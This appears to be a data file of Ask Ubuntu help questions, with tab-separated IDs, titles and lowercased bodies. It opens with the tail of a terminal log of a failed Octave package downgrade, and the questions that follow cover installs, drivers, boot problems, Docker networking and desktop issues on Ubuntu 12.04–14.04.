libreadline.so.6.3.old lua libhistory.so.6 libpcrecpp.so.0 libpcre.so libsdl2-2.0.so.0 pkgconfig libhistory.so.6.3 libpcrecpp.so.0.0.0 libpcre.so.1 libsdl2-2.0.so.0.1.0 python2.7 libhistory.so.6.3.old libpcre.la libpcre.so.1.2.2 libsdl2.a vmd liblua.a libpcreposix.a libreadline.a libsdl2.la libpcre.a libpcreposix.la libreadline.old libsdl2main.a $ : /usr/local/lib $ sudo apt-get install octave reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : units rtkit conky-std libpulsedsp libgsl0ldbl pulseaudio-utils use 'apt-get autoremove ' to remove them . the following extra packages will be installed : liboctave2 octave-common suggested packages : octave-info octave-doc octave-htmldoc the following new packages will be installed : liboctave2 octave octave-common 0 upgraded , 3 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/12.3 mb of archives . after this operation , 43.8 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! liboctave2 octave-common octave install these packages without verification [ y/n ] ? y selecting previously unselected package liboctave2 . ( reading database ... 368749 files and directories currently installed . ) unpacking liboctave2 ( from ... /liboctave2_3.8.1-1ubuntu1~octave1~precise1_amd64.deb ) ... selecting previously unselected package octave-common . unpacking octave-common ( from ... /octave-common_3.8.1-1ubuntu1~octave1~precise1_all.deb ) ... selecting previously unselected package octave . unpacking octave ( from ... /octave_3.8.1-1ubuntu1~octave1~precise1_amd64.deb ) ... processing triggers for menu ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... processing triggers for man-db ... setting up liboctave2 ( 3.8.1-1ubuntu1~octave1~precise1 ) ... setting up octave-common ( 3.8.1-1ubuntu1~octave1~precise1 ) ... setting up octave ( 3.8.1-1ubuntu1~octave1~precise1 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for menu ... $ : /usr/local/lib $ octave /usr/bin/octave-cli : symbol lookup error : /usr/local/lib/libreadline.so.6 : undefined symbol : up $ : /usr/local/lib $ ls libhistory.a libpcrecpp.a libpcreposix.so libreadline.so libsdl2main.a libhistory.old libpcrecpp.la libpcreposix.so.0 libreadline.so.6 libsdl2.so libhistory.so libpcrecpp.so libpcreposix.so.0.0.2 libreadline.so.6.3 libsdl2_test.a libhistory.so.6 libpcrecpp.so.0 libpcre.so libreadline.so.6.3.old lua libhistory.so.6.3 libpcrecpp.so.0.0.0 libpcre.so.1 libsdl2-2.0.so.0 pkgconfig libhistory.so.6.3.old libpcre.la libpcre.so.1.2.2 libsdl2-2.0.so.0.1.0 python2.7 liblua.a libpcreposix.a libreadline.a libsdl2.a vmd libpcre.a libpcreposix.la libreadline.old libsdl2.la $ : /usr/local/lib $ the following below is bain 's suggested commands since 5/9/2014 : $ sudo ppa-purge ppa : octave/stable updating packages lists w : gpg error : http : //us.archive.ubuntu.com precise release : unknown error executing gpgv w : gpg error : http : //repo.steampowered.com precise release : unknown error executing gpgv w : gpg error : http : //dl.google.com stable release : unknown error executing gpgv w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //us.archive.ubuntu.com precise-updates release : unknown error executing gpgv w : gpg error : http : //us.archive.ubuntu.com precise-backports release : unknown error executing gpgv w : gpg error : http : //packages.mate-desktop.org precise release : unknown error executing gpgv w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //security.ubuntu.com precise-security release : unknown error executing gpgv w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : gpg error : http : //deb.playonlinux.com maverick release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/release w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release w : some index files failed to download . they have been ignored , or old ones used instead . ppa to be removed : octave stable comm : file 2 is not in sorted order package revert list generated : liboctave2/precise octave/precise octave-common/precise disabling octave ppa from /etc/apt/sources.list updating packages lists w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //security.ubuntu.com precise-security release : unknown error executing gpgv w : gpg error : http : //repo.steampowered.com precise release : unknown error executing gpgv w : gpg error : http : //dl.google.com stable release : unknown error executing gpgv w : gpg error : http : //us.archive.ubuntu.com precise release : unknown error executing gpgv w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //us.archive.ubuntu.com precise-updates release : unknown error executing gpgv w : gpg error : http : //us.archive.ubuntu.com precise-backports release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : a error occurred during the signature verification . the repository is not updated and the previous index files will be used . gpg error : http : //extras.ubuntu.com precise release : unknown error executing gpgv w : gpg error : http : //deb.playonlinux.com maverick release : unknown error executing gpgv w : gpg error : http : //packages.mate-desktop.org precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : gpg error : http : //ppa.launchpad.net precise release : unknown error executing gpgv w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/release w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/precise-updates/release w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release w : some index files failed to download . they have been ignored , or old ones used instead . reading package lists ... done building dependency tree reading state information ... done e : release 'precise ' for 'liboctave2 ' was not found unable to find an archive `` precise '' for the package `` liboctave2 '' unable to find an archive `` precise '' for the package `` liboctave2 '' the following packages will be downgraded : octave octave-common the following new packages will be installed : liboctave1 { a } the following packages will be removed : conky-std { u } libgsl0ldbl { u } liboctave2 { u } libpulsedsp { u } pulseaudio-utils { u } rtkit { u } units { u } 0 packages upgraded , 1 newly installed , 2 downgraded , 7 to remove and 0 not upgraded . need to get 0 b/11.1 mb of archives . after unpacking 10.6 mb will be freed . do you want to continue ? [ y/n/ ? ] y warning : untrusted versions of the following packages will be installed ! untrusted packages could compromise your system 's security . you should only proceed with the installation if you are certain that this is what you want to do . octave-common octave liboctave1 do you want to ignore this warning and proceed anyway ? to continue , enter `` yes '' ; to abort , enter `` no '' : yes ( reading database ... 370422 files and directories currently installed . ) removing conky-std ... removing libgsl0ldbl ... processing triggers for man-db ... processing triggers for menu ... processing triggers for doc-base ... processing 1 removed doc-base file ... registering documents with scrollkeeper ... processing triggers for libc-bin ... ldconfig deferred processing now taking place selecting previously unselected package liboctave1 . ( reading database ... 370388 files and directories currently installed . ) unpacking liboctave1 ( from ... /liboctave1_3.6.1-1ubuntu1ppa1~precise1_amd64.deb ) ... dpkg : warning : downgrading octave from 3.8.1-1ubuntu1~octave1~precise1 to 3.6.1-1ubuntu1ppa1~precise1 . preparing to replace octave 3.8.1-1ubuntu1~octave1~precise1 ( using ... /octave_3.6.1-1ubuntu1ppa1~precise1_amd64.deb ) ... unpacking replacement octave ... dpkg : warning : downgrading octave-common from 3.8.1-1ubuntu1~octave1~precise1 to 3.6.1-1ubuntu1ppa1~precise1 . preparing to replace octave-common 3.8.1-1ubuntu1~octave1~precise1 ( using ... /octave-common_3.6.1-1ubuntu1ppa1~precise1_all.deb ) ... unpacking replacement octave-common ... processing triggers for menu ... processing triggers for man-db ... processing triggers for desktop-file-utils ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for gnome-menus ... ( reading database ... 369976 files and directories currently installed . ) removing liboctave2 ... removing pulseaudio-utils ... removing libpulsedsp ... removing rtkit ... removing units ... processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for man-db ... processing triggers for install-info ... processing triggers for menu ... setting up liboctave1 ( 3.6.1-1ubuntu1ppa1~precise1 ) ... setting up octave-common ( 3.6.1-1ubuntu1ppa1~precise1 ) ... installing new version of config file /etc/octave.conf ... setting up octave ( 3.6.1-1ubuntu1ppa1~precise1 ) ... octave : symbol lookup error : /usr/local/lib/libreadline.so.6 : undefined symbol : up dpkg : error processing octave ( -- configure ) : subprocess installed post-installation script returned error exit status 127 no apport report written because maxreports is reached already processing triggers for libc-bin ... ldconfig deferred processing now taking place processing triggers for menu ... errors were encountered while processing : octave e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : setting up octave ( 3.6.1-1ubuntu1ppa1~precise1 ) ... octave : symbol lookup error : /usr/local/lib/libreadline.so.6 : undefined symbol : up dpkg : error processing octave ( -- configure ) : subprocess installed post-installation script returned error exit status 127 processing triggers for menu ... errors were encountered while processing : octave warning : something went wrong , packages may not have been reverted
459810	best backup software for ubuntu	i need a backup software for ubuntu 14.04 that has a gui that can backup my entire system to an external hard drive or network drive . any recommendations ?
459811	ca n't connect ubuntu desktop to wi-fi	the desktop is running ubuntu 12.04 . i 've tried to connect it to my wi-fi . my wireless network is available but it wo n't let me connect . i typed in the password and it will try to connect , but then it ask for my password again . what should i do ?
459812	ubuntu and phpmyadmin	i 've installed ubuntu 14.04 in my vm virtual box , installing phpmyadmin in the process using the command sudo apt-get install phpmyadmin i configured phpmyadmin with apache2 and advanced options , and also set up a username and password . i 'm currently logged into my virtual box and have opened ubuntu 14.04 . i 'm also logged into my webmin 1.680 page using localhost:10000 . however , when i attempt to open phpmyadmin in a new browser window , using the appropriate url details , i receive a 404 error . i 've tried the various suggestions listed here and here , but have not been able to correct the problem . any suggestions ?
459815	dragging nautilus window over workspace switcher hang the desktop workspace gui	ubuntu 14.04 : after i enable the workspace and start moving objects/icons from one workspace to another , it works fine for few minutes but the system freezes after sometime and i can not do anything . any idea how to solve this issue ?
459816	are there differentiating disks in kvm ?	i 'm currently playing with vmbuilder . it works fine and enables to get a running machine in five to seven minutes with average non-server hardware . i imagine that on a faster hardware with more memory , this can indeed be reduced to `` less than a minute '' , like promised by the documentation . in windows with hyper-v , i can deploy a machine within a few seconds . hyper-v has a feature called differentiating disks¹ . basically , one creates a virtual machine , installs a linux distribution on it , shuts down the machine and makes the disk read-only . then , another virtual machine is created , using the already created disk as a base disk and a new one as a differentiating disk—the step which takes a few seconds . the last step : boot the machine and configure the network and the host name . is it something which is possible to do in ubuntu ? i 've searched for differentiating disks in kvm , but have n't found anything . what are my options ? ¹ while it should n't be used in production because of its impact on the i/o , it 's still very useful for development and testing machines where recycling ( being able to throw the machine away and create a fresh one ) is much more important than the i/o speed .
459817	how to install vmware ?	hi i am a complete noob at ubuntu i really would like to learn it ... i am on ubuntu 14.04 i need help to install vmware or vmplayer but i donât quite understand the written command to install it can someone please help me thanks you very much
459819	upgrade restart fail	upgrading from v13.04 to 13.10 , all went well until `` restart to complete '' -- screen did not come up for restart ( nvidia geforcegtx650 ) . i tried various suggestions , but now can not get even grub menu on screen . i can see files ( at least some ) from a networked computer ( shared directory ) , or from a live dvd of linux mint ( i ca n't get a screen using ubuntu some live dvds ) . i thought i could just copy data files to an external drive or networked computer , but i do n't have permissions . can i install from a live dvd next to existing ( but screwed up ) os ( dual boot ) ? would that be any help if i can ?
459820	make ubuntu compatible with arabic language	i have installed ubuntu 14.04 lts and i want to make ubuntu compatible with arabic language can you help me please
459823	ca n't use boot from usb after installing ubuntu 14.04	i did a full install of ubuntu 14.04 and am now trying to boot from the ubuntu 14.04 usb that i made but when i switch the boot order in the boot menu to boot from the usb it just goes back to my current install of 14.04 on my hdd and wo n't let me boot from the usb . what can i do to solve this issue ?
459827	uninstalling manually installed oracle java	i ( naively ) followed this guide : http : //www.wikihow.com/install-oracle-java-on-ubuntu-linux for jdk 8u5 . everything works fine , except i 'm having some problems with jframes that i was n't having before , so i would like to revert to my previous installation . i was wondering if the best way to uninstall is to simply go back through the tutorial , and delete the files and directories i 've created ? or is there a better/cleaner option .
459829	14.04 ubuntu complete install resolution problem	first time linux user , using an old fijitsu siemens v5535 , intel pentium dual core , 2gb ram i cant get out of 640x480 resolution ive tried xrandr functions , it says my max size is 640x480 which is driving me up the wall as i cant see half the window for all the programs and settings especially display settings , i cant detect displays , stuck in `` built in display '' any tips would be appreciated
459831	do i need intall nvidia driver on ubuntu 14.04 ?	i have dell latitude e6430 which include a nvidia nvs something 1gb , so is it necessarily to install a driver for it ?
459836	problem with active corners and unity tweak in ubuntu 14.04	i have a problem with unity tweak tool . the problem is when i configure the active corners for reveal all the programs it is not saved between sessions , so i must configure them every time that i launch ubuntu . the version i 'm running is 14.04 ( i am from chile and i do n't speak english very well . )
459838	webex is not working in ubuntu 14.04 please help	webex is not working in ubuntu 14.04 . do i need to install 32bit java and fire fox to get this worked ? is there any option in 64 bit itself
459840	lock screen not working . 14.04	i recently upgraded to 14.04 and since then my lock screen is not working.i read online that gnome-screensaver is not supported in trusty and it was suggested that i install xscreensaver instead . the latter worked fine for only a few days . moreover even when i log out , i 'm not prompted for a password while logging back in . i read a bit more and found that in trusty unity has its own lock screen . so instead of the old lightdm/gnome-screensaver we can use unity . i found this and tried to check if enabling the lightdm lock screen helped in any way . as it turns out i do n't have the lockscreen option as mentioned in the link . what could be a possible way to solve the issue ?
459841	unity crashes unexpectedly , no option for recovery	sometimes it occurs that my unity session crashes just like that - no window decorations , no panel , but whatever was going on in the background continues , like music playback . problem is though it can not be restarted , since the option to kill the x server has been removed from 14.04 . i tried to bind the `` sudo service lightdm restart '' to a shortcut , to no avail . hitting ctrl+f1 to log in to the console does n't work either .
459842	weird horizonal marks on my monitor	i installed ubuntu 14.04 lts ( 64bit ) on my desktop recently.but the monitor sometimes shows short-lived weird horizonal marks , like the signal being interfered . i 'm trying my best to google and solve it ( install proprietary graphics driver ) but no result . btw , i 'm sure the hardware is ok because there is no such problem when running win7 ( 64bit ) ( dual system , win7 & ubuntu ) . here is my desktop : cpu : e3 1230 v3 gpu : amd r7 260x ram : 8gb monitor : aoc 23 '' ( 1080p ) could you give me any suggestion ?
459846	why ca n't i install from a bootable usb ?	my computer refuses to install from a usb , it keeps insisting on a cd , which i do n't have . how do i create a bootable usb and enable my system to boot from it ?
459849	how to get vuze working on 14.04	i installed 14.04 on a new computer and after installing vuze it will not show getting started screen or do any searches . vuze opens but after that absolutely nothing works.i have re-installed with the newest version from vuze with all updates done but still nothing . i ran vuze config and all is good there with open ports on both tcp and udp . it is not a internet problem as vuze on my laptop which is running 12.04 still works perfectly .
459850	ubuntu 14.04 live usb - boots , then reboots ?	i downloaded an ubuntu 14.04 iso from the ubuntu webiste , and then installed it via linuxlive usb creator using 13.10 parameters . if i boot from it from my amd a10-5800k system , it will get in and i can even start running programs , but then it will just end and reboot . i 'd appreciate any help ! thank you !
459851	how to open multiple vlc interface ( window ) in xubuntu 14.04 lts	i am using xubuntu 14.04 lts . i notice new menu only allow to open one interface ( window ) of vlc . i want to open two interface from menu at the same time for vlc . is it possible to have that ?
459852	ca n't boot a live usb on windows 7	i want to install ubuntu 14.04 lts ( i have tried 64 and 32bits ) but i always get this , it does n't matter if 1 hour has passed btw , a cd with ubuntu 12.04 does work .
459853	how do i get the source code of the unity interface and compile it ?	i wanted to change some things in unity . so how to download and compile the code ?
459859	how can i install the drivers for ralink rt5592 on ubuntu 14.04 lts ?	i am trying to install the drivers for a wireless pcie card on my brother 's ubuntu 14.04 lts partition ( the other partition runs windows vista , where the card already works ) . we bought him this card since it advertised linux compatibility right on the box , but so far we have n't been able to make it work . the wireless connection does not show up in the upper-right corner , and from reading this ubuntu forums post it appears that we need to compile the driver ourselves . i shared my laptop 's wireless connection via ethernet with his desktop in order to download the driver source and install build-essential . unfortunately , the post seems to indicate that this works for 12.04 lts , but it 's not working for us on 14.04 lts . when we run make , we seem to get errors , which i redirected to a text file and posted here . if anybody has any ideas on what we need to do to get wireless internet working on my brother 's desktop without having to boot vista instead , it would be much appreciated .
459861	how can i enable user switching in xubuntu ?	i 've just installed xubuntu 14.04 in my desktop pc but i just can not get user switching working . it 's funny because in the session menu on top right it does appear but in gray and unclickable just like the hibernate function does . if anyone could help me out , i 'd really appreciate it . thanks ! !
459862	virtualbox usb tablet not recognized in ubuntu 12.04.4	my touchpad is not recognized in ubuntu 12.04.4 running in virtualbox 4.2.16 . it is working fine in ubuntu 14.04 . is there some trick to get this working ? i am really missing the two finger scroll feature . many thanks ...
459864	lotus notes installation issue with ubuntu 14.04 32 bit	hi i have just installed ubuntu 14.04 32 bit . while installing lotus notes 9 , its showing error dependency is not satisfiable : libcupsys2
459867	usb needs superuser	so i recently plugged in an usb and i do n't know why it needs superuser now . when i go to nemo in sudo , it listed my old usb as usb1 and my new usb as ducky momo ( it 's name is ducky momo and it 's a new usb i bought recently ) so how do i access it without sudo , because i think easy tag wo n't work in superuser , i guess .
459869	install huion h580 tablet driver from source code	i have a huion h580 tablet , that i bought from dx.com and it does n't work at ubuntu . i found this driver : https : //github.com/digimend/huion-driver it should be installed from the source code , but what i did did n't work : paulo @ paulo-mccartney : ~/downloads/huion-driver-master $ make make -c /lib/modules/3.13.0-24-generic/build subdirs=/home/paulo/downloads/huion-driver-master modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-24-generic' cc [ m ] /home/paulo/downloads/huion-driver-master/hid-huion.o building modules , stage 2 . modpost 1 modules cc /home/paulo/downloads/huion-driver-master/hid-huion.mod.o ld [ m ] /home/paulo/downloads/huion-driver-master/hid-huion.ko make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-24-generic' paulo @ paulo-mccartney : ~/downloads/huion-driver-master $ cd /usr/src/linux-headers-3.13.0-24 paulo @ paulo-mccartney : ~/downloads/huion-driver-master $ sudo make install [ sudo ] password for paulo : make -c /lib/modules/3.13.0-24-generic/build subdirs=/home/paulo/downloads/huion-driver-master modules_install make [ 1 ] : entering directory `/usr/src/linux-headers-3.13.0-24-generic' install /home/paulo/downloads/huion-driver-master/hid-huion.ko ca n't read private key depmod 3.13.0-24-generic make [ 1 ] : leaving directory `/usr/src/linux-headers-3.13.0-24-generic' install -d -m 0644 hid-huion.conf /etc/depmod.d/hid-huion.conf depmod -a install hid-rebind /sbin install -m 0644 hid-rebind.rules /lib/udev/rules.d/70-hid-rebind.rules udevadm control -- reload paulo @ paulo-mccartney : ~/downloads/huion-driver-master $ rmmod hid-huion rmmod : error : module hid_huion is not currently loaded also found this video which installed this tablet in debian : https : //www.youtube.com/watch ? v=wj0-n0gmexw but i do n't know how to compile the kernel to support the tablet . how could i install this driver ? thanks
459870	why are n't menus integrated in bar when running as super user ?	when i open any window as root , menus are n't integrated in the menu bar or in the window 's title bar . why does this happen ? can i prevent this behavior ?
459876	wireless not working ubuntu 12.04 bcm 94311 nvidia nforce ethernet controller	i have an hp pavilian tx 2000 and recently switched to ubuntu 12.04 . once i got the b43 driver the wireless worked great until one day it just quit working . when i turn on the switch it pick up bluetooth but not wireless i have tried several other wireless chips and none work . any help would be appreciated !
459877	showing error message `` unable to create ext4 partition ''	i have a lenovo ideapad u510 laptop with 1tb hdd and 24gb ssd . it had a genuine windows 8 previously installed . but i wanted to install ubuntu 14.04 lts 64 bit in it . so that i have wiped all the partitions ( also recovery partitions ) to install only ubuntu , but at the installation state after creating the partition table and choosing the username the installation process is being stopped showing `` the ext4 file system creation in partition # 2 of scsi2 ( 0,0,0 ) ( sdb ) failed . '' i have tried with uefi boot on , legacy boot on , secured boot off but it 's always showing the same error message . this laptop currently has no os . is the machine bricked or how can i solve this problem ?
459878	package dependencies can not be resolved in ubuntu 14.04	currently i am using ubuntu 14.04 lts . whenever i am trying to install any package form ubuntu software center i am getting the following message `` package dependencies can not be resolved '' . and also from the update center it is not showing any update information . is there any permanent solution ? for information i have tried the commands like `` sudo apt-get clean '' and `` sudo apt-get update '' . but the its not working as i am getting the message repeatedly . what can i do ? please help !
459880	is there any linux in built application or any method to find the network usage ( data usage ) of the internet connection ?	is there any linux in built application or any method to find the network usage ( data usage ) of the internet connection ? i know there are many softwares that can be installed into os for this purpose . but i doubt there is a in-built linux tool for this purpose .
459888	shop and in game item shop not working in league of legend ( lol )	i 'm using ubuntu 14.04 and playonlinux 4.2.2 . i managed to get league of legends almost running perfectly , there are only two problems . the first is that the shop to buy things with ip/rp is just a black screen . here is a screenshot : the second problem is that in the game , during the match , some menus are messed up , as if they were in a different resolution from the game 's current resolution . for example , the item shop opens a normal window , but this window 's contents are all over the screen . here is a screenshoot : all the rest is working fine , i even get high fps . i installed lol via playonlinux and then i applied tuxlol patch . i have an optimus notebook , dell inspiron 14r 5421 , it has an intel integrated video card and nvidia geforce 730m dedicated card , which are properly handled by bumblebee . how do i fix these two problems ? could somebody help me , please ?
459892	what is the difference between fglrx & ati official drivers ?	what is the difference between this driver & this ? are both same but first placed in repository ?
459893	with these specs , shall i get 32 or 64 bit ?	i am worried about the performance of my machine with either of the operating systems , and do n't want to have to re-install a few times to find what 's best , and likely mess up something in the process . my specs are as follows : ( dell inspiron 530s ) processor : intel core duo cpu e7300 @ 2.66 ghz ram : 3.0 gb i currently am running a 32-bit windows vista ( most people here should understand why i want to get ubuntu ; vista is awful ) .
459899	audio output going to earphone port on starting ubuntu	whenever i start ubuntu , the audio output by default goes to the earphone port . the speakers work when i insert earphones into the port and then remove them . i noticed this problem first when i left the earphones plugged in before starting ubuntu . how do fix this problem ?
459900	how to find my current java_home in ubuntu ?	how to find my current java_home in ubuntu ? i have to set java_home path when installing maven .
459903	audio cd - can not mount . message did not receive a reply ( timeout by message bus )	i am getting the following error when i click on the audio cd on my launcher - `` audio cd - can not mount . message did not receive a reply ( timeout by message bus ) '' dmesg | grep cd-rom [ 1.899068 ] scsi 1:0:0:0 : cd-rom hl-dt-st dvd+-rw gu40n a104 pq : 0 ansi : 5 [ 1.901530 ] cdrom : uniform cd-rom driver revision : 3.20 [ 1.901729 ] sr 1:0:0:0 : attached scsi cd-rom sr0 $ ls -lah /dev/cd* lrwxrwxrwx 1 root root 3 may 3 11:44 /dev/cdrom - > sr0 i can not play the audio cd from rhythmbox , but can only play the audio cd from vlc if i select open disc - > audio cd /dev/cdrom . any ideas how to get rid of the error ?
459904	pgm picture request	i am doing a project on face recognition and for that i need pgm pictures . so can you please provide me with a link from where i can get a pgm camera for my webcam ? or at least how to get a pgm photomm ?
459906	docker is blocked by ufw	i have problem with docker network in ubuntu 14.04 . i have installed docker.io from official repo and i 've added default_forward_policy= '' accept '' to /etc/default/ufw but my docker containers still can not fetch pages ( pinging seem to work ) . logs from /var/log/docker.log : may 3 08:42:21 niuniobook kernel : [ 1106.338264 ] [ ufw block ] in=docker0 out= physin=veth5bdb mac=ba:18:3c:93 : f9:68 : fa:4b : d0:45 : db : ae:08:00 src=172.17.0.2 dst=172.17.42.1 len=60 tos=0x00 prec=0x00 ttl=64 id=43837 df proto=tcp spt=55336 dpt=20559 window=29200 res=0x00 syn urgp=0 may 3 08:42:36 niuniobook kernel : [ 1121.447687 ] [ ufw block ] in=docker0 out= physin=veth5bdb mac=ba:18:3c:93 : f9:68 : fa:4b : d0:45 : db : ae:08:00 src=172.17.0.2 dst=172.17.42.1 len=60 tos=0x00 prec=0x00 ttl=64 id=7222 df proto=tcp spt=38480 dpt=20559 window=29200 res=0x00 syn urgp=0 may 3 08:42:56 niuniobook kernel : [ 1141.037623 ] [ ufw block ] in=docker0 out= physin=veth5bdb mac=ba:18:3c:93 : f9:68 : fa:4b : d0:45 : db : ae:08:00 src=172.17.0.2 dst=172.17.42.1 len=60 tos=0x00 prec=0x00 ttl=64 id=38012 df proto=tcp spt=37959 dpt=20559 window=29200 res=0x00 syn urgp=0 may 3 08:43:15 niuniobook kernel : [ 1160.956373 ] [ ufw block ] in=docker0 out= physin=veth5bdb mac=ba:18:3c:93 : f9:68 : fa:4b : d0:45 : db : ae:08:00 src=172.17.0.2 dst=172.17.42.1 len=60 tos=0x00 prec=0x00 ttl=64 id=24121 df proto=tcp spt=51148 dpt=20559 window=29200 res=0x00 syn urgp=0 may 3 08:44:08 niuniobook kernel : [ 1213.709898 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00:01:00:14 : bf:6e:75:44:08:00 src=192.168.1.1 dst=224.0.0.1 len=28 tos=0x00 prec=0x00 ttl=1 id=0 df proto=2 may 3 08:44:16 niuniobook kernel : [ 1221.902392 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:68:17:29:27 : ac:86:08:00 src=192.168.1.78 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=21208 proto=2 may 3 08:45:11 niuniobook kernel : [ 1276.281997 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00:01:74 : ea:3a : f4:8f:06:08:00 src=192.168.1.254 dst=224.0.0.1 len=32 tos=0x00 prec=0xc0 ttl=1 id=0 df proto=2 may 3 08:45:11 niuniobook kernel : [ 1276.898590 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:68:17:29:27 : ac:86:08:00 src=192.168.1.78 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=21209 proto=2 may 3 08:46:14 niuniobook kernel : [ 1339.675787 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00:01:00:14 : bf:6e:75:44:08:00 src=192.168.1.1 dst=224.0.0.1 len=28 tos=0x00 prec=0x00 ttl=1 id=0 df proto=2 may 3 08:46:21 niuniobook kernel : [ 1346.432807 ] [ ufw block ] in=wlan0 out= mac=01:00:5e:00:00 : fb:68:17:29:27 : ac:86:08:00 src=192.168.1.78 dst=224.0.0.251 len=32 tos=0x00 prec=0x00 ttl=1 id=21214 proto=2 after disabling ufw docker can not even connect to any port ( pinging still works ) .
459907	how to enter recovery mode from grub	i have a dual boot installation with windows 7 and ubuntu 12.04 lts . i am currently trying to solve this problem , where any mouse and keyboard input is ignored on the login screen . the apparently helpful answer ( `` phew ! thanks for the help blue ; so this is what i ended up doing : ... '' ) suggests to start by entering the recovery mode from the grub boot menu . my grub ( `` gnu grub version 1.99-21ubuntu3.14 '' ) boot menu displays the following options : ubuntu , with linux 3.2.0-50-generic-pae ubuntu , with linux 3.2.0-50-generic-pae ( recovery mode ) previous linux versions memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) windows recovery environment ( loader ) ( on /dev/sda1 ) windows 7 ( loader ) ( on /dev/sda4 ) the first option brings me to the usual graphical login screen where , in the current state , there is no reaction . the second option ( `` ubuntu ( ... ) ( recovery mode ) '' ) displays lots of text running over the text-only screen , then it enters the graphical login screen as well , where again i have no way to input anything . how do i get into recovery mode ? i have found quite some similar questions , none of which seems to apply to my situation : this one seems to refer primarily to single-boot-setups where one does n't normally get into grub , but even then , once within grub , the entry `` ... ( recovery mode ) '' is claimed to help , which is not the case for me . this one too claims that the `` ... ( recovery mode ) '' entry will bring me anywhere else than the normal ubuntu boot entry . this one does n't even see any option that looks like a recovery mode . this one talks about getting somewhere else with the `` ... ( recovery mode ) '' entry , but being unable to input anything there . this one talks about being unable to enter the recovery mode from grub , though with different symptoms that what i am experiencing ( plus there is no answer/solution provided yet ) . this one experiences simply a freeze upon entering the `` recovery mode '' from grub . this one too does get into some recovery menu and has their problem only then .
459908	connecting android device to remote machine using usb	i have an android device which i have connected to my desktop running linux using usb . i am accessing a remote machine using my desktop which is also running linux . i want to run some command on my remote machine and want them to be reflected to my android device or i can say the port of my linux desktop is behoving as the port for remote desktop..
459909	installed ubuntu on usb stick but the default password is not being accepted	i have installed ubuntu 14.04 on my usb stick using the universal usb installer from pendrive linux . everything went well and ubuntu installed without any problems . i can then select the usb stick from my bios and boot ubuntu . i am then requested to enter my username and password . i have searched on ask ubuntu and found that the default password should be ubuntu and the password box is to be left empty , but unfortunately the information is not being accepted , and i can not login to ubuntu . how can i get past the login screen and use ubuntu ?
459912	can not boot from dvd with iso 14.04 ( 32-bit )	have downloaded now 3 times ubuntu 14.04 lts and burned on dvd on my win 7 system . after inserting the dvd in my xp3 computer ( bios boot sequence is dvd and there after hdd ) , and restart , i do not get an ubuntu but normal windows . is the burnt dvd at all bootable ? the download-file ( 993 mb ) and dvd shows this content on all 3 tries : ubuntu-14.04-desktop-i386.iso and not the figure shown in the chapter `` the dvd was not burned properly '' marked correct ? what is going wrong ? p.s.had not burned the image , rather copied iso used image burner and all went fine . thanks to all !
459913	japanese text , ubuntu 14.04 lts	i can not enter any japanese text under any application , although i have installed japanese language support and applied the japanese text engine . i can switch the entire system to japanese and i can read japanese texts without problems , however , i am not able to write japanese text the japanese text conversion box does not appear in any application . can you help me ?
459914	upgrading from edubuntu 13.10 to 14.04 using iso	i have edubuntu 13.10 and windows 7 running in my computer . i have edubuntu 14.04 iso and i want to upgrade to edubuntu 14.04 using usb stick . will upgrade keep all my files and settings ?
459915	show keyboard layout chart from command line	i 'm looking for a way to display the current keyboard layout chart from the command line . unfortunately xkbprint does not display utf-8 characters correctly ( afaict ) . in gnome , it is possible to click on the keyboard layout indicator applet and then `` show layout chart '' , which does the same thing as going through the menus of gnome-control-center ( btw , gnome-control-center keyboard is not an acceptable solution ) , so there must be a way to trigger an event that would pop up this window , right ? note that most of the time i do n't use gnome-panel .
